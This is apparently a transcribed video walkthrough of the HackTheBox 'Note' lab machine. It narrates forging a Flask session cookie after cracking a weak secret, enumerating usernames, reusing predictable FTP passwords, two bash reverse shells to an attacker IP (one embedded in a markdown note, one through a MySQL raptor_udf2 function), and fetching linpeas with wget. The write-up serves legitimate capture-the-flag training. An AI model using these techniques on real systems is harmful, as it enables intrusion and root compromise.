Note from HackTheBox was a really challenging machine for me, and it taught me what I didn't know before. So without further ado, let's just hop in, and a special shout out and thanks to Mr. Nico for his hints. So these are the nmaps scan I did. This is the full port range, and this is the basic nmap CSV, and we have 21 FTP. That version is not vulnerable to anything, and I could not able to log in anonymously. Then we have 22. Usually OpenSH is stable one, and I don't touch it. And then we have that 5000, which is WorkZook. Sorry for the bad spelling. It's some kind of a Python web server. So the Python version is nice, and that version was not affected by any kinds of vulnerability or publicly available exploits. So the only thing left for us to do is to pretty much hop in and browse the application. So let's go here, paste it in, and we can see some kind of a note-taking app. Of course, that's where the name comes from. So let's first browse to see if anything's interesting. First thing that caught my eye was that CKator there, but I researched that and it's not a big deal. Then let's just move on, and here we have notes. Try admin, not the case. Administrator, admin, not the case. I tried fuzzing that for SQL injections. For example, copy the request into Word, paste it, and pass it to SQL map. Not the case. So let's try to register and do test at test.com, test, and test. After submitting that, we have valid credentials. So if I log in there, we can see that we have some kind of an access. So here in notes, we don't have anything, but if I go to dashboard and do add note, let's try test or test, submit, and it needs to be at least 30 characters. So let's fill it a little bit and go to notes, and now we have it. So I tried, of course, fuzzing that thing for a lot of vulnerabilities, cross-site scripting, SQL maps, nothing works, and it's pretty safe. So what caught my eye is that the machine is reverted, and I just made a note, and we can see that the note is the ID 3. So there must be notes like 0, 1, and 2, which are for a different kind of users. So if I go to 1, nothing happens, so they have some kind of a session management system. Now is the time to just see what is that session management and how that thing works. So let me just log out like that and do interception to on and do test, submit. Now this is the request. I'm gonna do right click, and I think there's an option to intercept the response. Do intercept the response, alright, forward. And we can see set cookie equals to session and something. So this something is supposed to be a JWT token. So I'm just gonna copy that and paste into some kind of a notes file, because we're gonna need that. So this is the token that's been issued upon a valid login. So if I forward that thing, we can see that we are back on the same app. So let's go to jwt.io, and JWT tokens are not that hard to understand. So you have 3 parts. Let me just paste the token, and we have sample one, which is we have the header, payload, and the signature. That's it. So we are mainly interested in these 2 values there. But let's see, if I paste the token, we can see it's invalid signature because we are missing the secret. Every JWT token relies on some kind of a secret to pretty much encode the data what's inside. And if we have that secret, we can, of course, issue in the tokens. So the next step is to pretty much go ahead and try to brute force that secret, and I use Flask JWT unsigned for that. So let's just dive in and show how it's done. Alright, so to pretty much try and brute force that secret, there's a vulnerability of where if the secret of the JWT is a simple one, like really easy to brute force, it can be brute forced. So we're gonna do just that and try to brute force that secret thing. And the idea here is, if we manage to get that secret, we can issue token for any kind of users. And we must have the ability to enumerate users, because I think we have, because if I were to log out now and do like admin, we can see that invalid credentials. But if I do like test the user that we previously generated with the admin password, which is the wrong one, submit it, come on, we can see we have invalid login. So we have either invalid credentials for a non-existing user and invalid login for a valid username. So let's first try to crack that secret, then we're going to try to develop a POC for scanning usernames based on a WordVis file, and then we can combine things and issue a certificate for that specific user. So let's see. For trying to decode and brute force that secret thing, I use Flask unsign, and pretty much that's a Python library, so module, sorry. You can install it if you pretty much navigate to Flask unsign. There is the official documentation, and here you can install it, and there's pretty much all of demos of how this can be done. So here there's a bunch of versions, and we need to pass WordVis, we need to pass the cookie we have, and we need to pass the unsign option there. So Flask unsign, then we have, what was it? All right, then we're gonna need cookie, paste the cookie we have from the request. All right, and then we're gonna need that no literal evo, NE, due to the fact that a lot of secret key are binary string, all the while in the WordVis are encapsulated with double single quotes to represent Python string. This is done to easier generate WordVis without having to store the data in the arbitrary binary format. So pretty much that's for making the thing work easier. Then do NE, and now we need to specify the WordVis, which is W, I think, yeah. So user share WordVis and rock. So let's try that. And there we go. We have the secret of being 1, 2, 3. So let's just copy and paste it right there. And now let's just go and try to develop a POC for enumerating users on the box. Of course, this can be done with the intruder, burp intruder, but why not develop our own? So let's go. All right, now let's try to develop a simple POC for scanning usernames. So let's open up a new pane in Tmux and do vim, what was it? Username guesser.py. Now the first step is to pretty much, of course, open the file we want to pretty much scan. So the idea is to pass a file as argument while running the script, and it's gonna read the file and then scan all the usernames and pass it as to the HTTP request. So I think that in Python we have that we need to import sys, and then, for example, print sys fgv1 is gonna be the first argument. I'm not completely sure, so I'm just gonna test it on my own. I'm gonna try that and do Python 3 and username guesser and do ASD. Right, all right. So this is gonna be our file. So with open, what was the syntax actually? Python read file line by line. I'm so bad with memory syntaxes. I'm just gonna do file name equals sys fgv1. So that's gonna be our file name. Then we need to open that as a read mode. So with open file name as file, with open file name as file, do lines equal file read line. All right. I think that's it. So print lines. Let's try that. Do opt seclist usernames, top usernames. We have admin, test, guest. So I think we've done that. So I wonder what that thing is doing. Maybe it's separating it in some way. Let's try and paste that thing. Now run the thing again, and I'm not seeing any difference. But oh, there's not a new line character. Maybe that's better. All right. So we're gonna need now, since we have all the lines, we're gonna need to perform an HTTP request. So import requests and do r equals request dot, or before that, data is going to be equal to, and data needs to be right here, data is going to be equal to, actually let's try for wine in wines, print wine. All right. I just wondering if I can loop through things, and I can. So now we're gonna do data is equal to, what was the data for the post request? Python post request. Yeah, we're gonna need some key, some value. All right, so data is gonna be wine. All right, and then we're gonna pass, for example, test or something 1, 2, 3, 4, right? So we have that wine variable, which is gonna be a username, and we have that 1, 2, 3, 4, and then we need the URL, of course, and then request post in URL and paste the object in JSON. I believe that's it. So let's try with URL equals to, do it need to be encoded? Yes, it does. So that's the URL. Paste it here and do x equals requests dot post. I believe it's capital one. No, it's small case. Post, then URL JSON equals to data. All right, that should be it. And print is a text. Nice. So let's close that and do, we have bad request. Not sure why. So let's debug that thing out. We have the URL, or maybe I need to paste the exact endpoint, maybe, if it's not the same. So let's try to log in, something, post login. Let me run that request through proxies and see what's going on. Proxies equals to HTTP 27.01.80.80. All right. Then do proxies. All right. Do interception again. Run that. And I think we needed to do like that. HTTP. All right. Google is our friend again. Python proxies request. Yeah, proxies HTTP to that. So we're gonna need HTTP to be equals, and that's in string, so in quotes. We don't need the quotes here, they are there. Like that. All right. Now let's try it once again. All right, that's it. So we have a root and something. So that's similar thing like the one used to send originally. So where is the login request there? Okay, let's send that to repeater, drop it, and now do a regular login request and compare the things. So like that. Come on. Username, oh yeah, that's why. So we need username equals test and the user and then the password to something. So in that case, we're gonna need to do here data equals username to be equals to wine, right? And then password to be equals to, not sure if is that the correct syntax. So let's try to see example about that. Or let's try just to run it and see what's gonna happen, since we have a proxy now, right? So let's run that, see if it's gonna work. It does not. So we have username equals to wine, and password, yeah, the syntax is wrong, but let me try to see the valid one. Come on. Of course. So request post data equals to number. Oh, all right. So that's the syntax. Username is equal to, following that logic, username like that, and then comma, password like that. That should be it now. If I run the thing, we have better request again. So let's try to capture the request again, see what's gonna happen. Username root, password root. Wasn't that the case? Username equals test. Oh, it's not a JSON object, because here we passed the JSON and here it's not. So I think we are not needing that JSON equals to data and just the data. So let's just remove that and try to capture it again. Username root, password. All right. So think that it's going to be working now, and it does. So we need to grep for a specific string now, which is going to be, what was it? If I do test admin, it's invalid login. If I do test1, it's invalid credentials. So we're going to need invalid login. So if invalid login in x.text, we're gonna do print nice. All right, and then do run the script again, and we need to close. But I think it hit the if statement. All right, one nice, that's it. So instead of nice, now the only thing we have to do is to pretty much type the username, which is gonna be wine. So run that again. We have test, all right, which is a valid user. So the next step is to try with different kind of usernames to run to different kind of, let's say, word list to try to enumerate the one we want. So try the net 10 million usernames. Yeah, like that. It's thinking. Come on. All right, so we have the username boo guest from our application, our POC Bruteforcer. So I have to apologize about my bad coding skills, especially doing it in video. That's the result of doing multiple coding in different languages at once. I just can't memorize syntax. Never mind, just let's try to do boo and test. So we have invalid login, and if we do boo1, we have invalid credentials. So boo is a valid user. Alright, now since we have a user, the next point is to pretty much instantiate and sign a new JWT and authorize as that user, tricking the application with boo. So let's do that. Just a friendly reminder, if you enjoy the videos I make sure to subscribe to the channel, like that video, and also comment section is yours. I accept all feedback. Also, I have a Discord server, link in description, where we share knowledge and experience based on pen testing / red teaming, and also doing CTFs together, so don't miss out and join. Now, let's continue. Now to sign the JWT token, we're gonna need the first JWT that was assigned to us, that from the login, and we're gonna need that secret. And also we're gonna need the payload from that JWT.io. So let me just go here, login as test. So now go to inspect and do maybe storage, yeah. Copy that token, paste in here, and we can see we have a header with walked in value equals to true, and we have username equals to test. So we're going to need to instantiate a new cookie based on that username variable to be bool instead of a test. For that to happen, we're going to need that Flask sign again. But that time, we're going to use that option sign, right? Sign, we're going to need to use the secret 1, 2, 3, and then we're going to use the cookie to be equals to, actually the comment is just there, and username equals to bool, and we need dash -l, which was for legacy. Generate verify signature using is dangerous legacy timestamp generator. Alright, so let's run that, and we have a valid JWT token. So if I were to copy that and go to Noter, go to log out, and we can try a simple test. So if I put intercept on, go to nodes, and here I type cookie equals to session equals to that, and forward the request. Not sure it worked as it should, so let me try it again. Session equals to that, forward. Alright, let's take another approach. If we go with test and log in. Alright, and if I replace the value of the JWT and refresh the page or go to nodes, there we are. We can see the nodes of that user without logging into the account. So let's go to the first one. Hello, thank you for choosing our premium service. Now you're capable of doing many more things. Alright. By the way, now you can access our FTP service as well. Your username is bool and the password is bool noter and exclamation point. Alright. Make sure to remember them and delete this. Alright. And we have a user being FTP admin. That's a note. And then we have before the weekend, delete the password note, ask the admin team to change the password. And I think that's the one we did. Alright. So now we can access the FTP server. So let me just close that and do copy the password, go to here and do FTP, paste the IP address, bool, and paste the password. So we have files and policy.pdf. So get policy.pdf, cd files, and nothing there. Alright, so let's exit that. And actually I'm going to do Firefox policy.pdf. And we have an overview. So password must not be shared with anyone, alright, shall not be written down. The interesting part here is that point 4 of password creation, default user password generated by application is in the format of username at site name exclamation point. So following that logic, we enumerated that we have an FTP admin here. So if I were to pretty much do FTP again and do FTP admin, and now instead of password to be bool at noter, it's going to be FTP admin at noter, and we walked in successfully. Now as an admin, we have 2 files. So we would need to download them both. So get, let's just do it like that, get the first file, and get the second file like that, exit the FTP and do, I have a directory called FTP, so I'm going to just see it there, and I've already downloaded all the things there. So I've extracted into 2 different directories in order to perform diff to see the differences between the files. So if I were to split my pane, and here I'm going to cd into zip1, alright, and here I'm going to cd into zip2, alright. Now I'm going to do clear and diff app.py zip to app.py, and we can right away observe that in the first zip file we had a username and password for a database, so we're gonna know that as well, like that. And here they replace that with a variable as it's supposed to be done, like with a local app setting variable. I'm not sure how it's been called in Python. And after that, we have a bunch of things that have been added. So we have a NAT for export nodes, Then we have added endpoint for export local nodes, and then we have export node remote. So that's the thing we're gonna be looking at, and we have also import node. The important part here is to consider that the format of the nodes is being in MD, and following that logic, if we can somehow export or import node, if we can force the application to run it, we can import a MD reverse shell. So let's go and do that. Alright, so let's start looking at the endpoints, and we're gonna start with that export node right there. So here we're gonna type export node, and we have export to PDF, and we have export directly from the cloud, and we have some kind of a URL. So the idea here is to pretty much create a bash reverse shell using MD format, and then paste it here, host a Python server, and just cross your fingers. So let's do that. Let's just do that. Let's go to here and cd into FTP, or do a directory cd and do vim shell.md. Now type -- quote and semicolon. I forgot the English name about that. Never mind. And then do bash -i. What was the syntax to bash reverse shell? Or actually, I have it right there. Let me just bash -i like that. Def tcp 10 10 40 80 443, and then do 1 at 0 or 0 at 1. All right, and then finish the syntax like that. All right, so this is the bash reverse shell in MD format, and to be honest, that's the first time I see things like that. So thank you for HackTheBox and Mr. Nick for teaching me stuff like that, because it's amazing. So let's just clear that out, do python 3 and HTTP server and catch session here. All right, now do, what's my IP address? HTTP 10 10 40 80, and then do shell.md, export, and we have a shell as a user svc. So if we go to home and cd svc, we can see that we have a user.txt. So the next step is to pretty much run Linpeas, in order to see the available preach escalation vectors. So let's just dive into it. All right, so let me just switch panes like that, and now go to here, make a directory privesc. I already have it. All right, remove everything here, and cp download Linpeas. Not quite. So let's try downloading again. So Linpeas GitHub. Go to here, and always go with the original, like the original creator of the Linpeas, because they update it really often, as you can see last 2 days. Yeah, so go to releases, linpeas.sh. Now save that and move it that directory. Move download linpeas.sh to here. I think it's downloaded. It does. And remove the Python server from there, and cd privesc, and do Python server again. Now go to temp and do wget 10 10 40 80 linpeas.sh, chmod posx linpeas.sh, and do linpeas.sh. So let's see what it got. I'm not sure pausing the video is going to be a good idea, because genuinely Linpeas is a fast tool and it runs through the system really fast. So I'm going to give it like 2 minutes. If it's not ready, we're going to pause the video, but we right away saw some results. And I know the first eye is, oh, we have red and yellow, but no, it's not the intended path of doing the box. It may be it could work. I haven't tested that, but that CV here is for the Ubuntu version of the box, and I'm not sure that that's the intended way. So let's just ignore it for now. I'm just gonna maximize the pane and let's see other data. Pretty much that's our shell here. And the vulnerable function is that MD to PDF. Nice. So come on. All right, we're pausing. See you right in a minute, guys. Oh, no, never mind. So let's scroll a little bit up and see the services. That's the Python server, and that's the MySQL database. So there are the sockets. Where are the processes? One thing that caught my eye is that MySQL user is being root instead of MySQL. And pretty much if we see the directories there, for example, it's MySQL mariadb.conf or debian.conf, but that's not for, yeah, it's for MySQL. We can see they are owned by root and root. So chances are the root user is being responsible for the database. So if we were to somehow find a way to execute commands for that root user, we could escalate our privileges to the box. So let's scroll a bit upwards. And yeah, MySQL history is all being by root. So I believe that the database is being owned by root. I mean, the root user is responsible for it, is being managing it. So let's try to find a way to pretty much run some kind of commands with the database and see if we can get a shell or if we can escalate our privileges. All right, so let's do that. All right, so a little bit searching led me to that page explaining how to pretty much privilege escalate if MySQL database is being running as root. So it points to a simple C exploit, which is that. So let's copy it and pretty much go and paste it. So vim raptor udf2-c set paste and paste it like that. Now, by following the blog post, that blog post, of course, is going to be linked in my description, so you can check it out. Let's try compile it. All right, and then create a shared library. So like that. And now we have 3 files, and we're going to need to transfer that CO thing. I mean, that one. So we already have a web server, and the next step is to pretty much, let's go ahead and authenticate to the MySQL and see if all the checks are like the vulnerable, like explained in the blog post. So we need to check for 2 flags, and if that secure privilege flag is missing, we should be able to pretty much escalate our privileges. So let's go ahead and do MySQL is the root, password, and paste it in. And I think we broke the terminal. All right, so let's catch another shell, but before that, move, what was it? Shell.md to here. It's like the same IP and run the Python server again. Now go to here, export note, export, and we have a shell, but that time do each Python 3 and do Python 3-c import pty, pty.spawn, and do bin bash. All right, and then do MySQL user root password and paste the password. All right, now let's try and check for the privileges the blog post explains. So let's see the plugin path. That's where our SO file should be stored. All right, I believe so. And then that's the secure flag, which is missing in our case as well. So we can proceed. Let's use MySQL database. Now we need to create a table. Actually, all the commands gonna be saved here. Use MySQL, create table, and then do y file, paste it here, and do, instead of var, actually, I'm gonna do it like that. We're gonna do temp. All right. And then we're gonna download it into the temp folder. So we're gonna need to exit that, cd into temp, and we get 10.10.4080 raptor udf2.so. All right. Now go with MySQL user root, password. All right. And paste it again. Use MySQL again. Create the table again. And insert values from the file we created, from the library. All right. And then I believe we need to select from foo into dump file. All right. So we need to specify that. But for dump file, we're going to need to specify that right here. Raptor so2. What was it? Raptor udf2.so. All right. And we need quotes for that. Oh my God. All right. So I'm going to do it like that. Save it again. That's why I'm using directory files, because a mousepad, because it makes the things a little bit easier. Now let's remove that. Come on. I'm afraid to type Ctrl W because it might break the terminal. So do it like that. And now the only thing we need to do is to pretty much create a function like that. And that function should be able to invoke system commands like that. And now let's check if we have that available function there. We have, and then the syntax is simple: select do system and then the command. So let's try like that, but instead of id, let's try bash reverse shell. Bash-c bash-i. I forgot the syntax again, but luckily I have it here. So bash-i like that. Def tcp 10.10.4080 443 0 at 1. I think it should be it. So if I were to catch a new session with port 443 and run that command, the function does not exist. So there's a thing which pretty much goes and flushes the database since we did not save the changes we made. I'm not sure why that is. Maybe it's some kind of policy, and that means we need to be quicker that time. So that's why I'm pasting commands right here, because we don't need to type it manually every single time. Until I came to that conclusion, I usually type the command for like 20 minutes or so, and now I got the idea of just doing things like that. And we can see right away by typing the very last command, we are root, and if we go to root, we can get root.txt. So the whole idea of exploit was pretty much to compile a library based on C, which library allows us to execute system commands. Now we include that library, create table, and somehow link things. That's how the exploit works, and the blog post explained it better than me. That's how we link things, and pretty much by having that library standing there, we can invoke it with what's so-called system MySQL functions. Yeah, we define a MySQL functions, which pretty much is using that shared library, which itself on its core is running system commands, and that's how we were able to get a shell. So that was the box, guys. I hope you enjoyed, and see you right in the next one.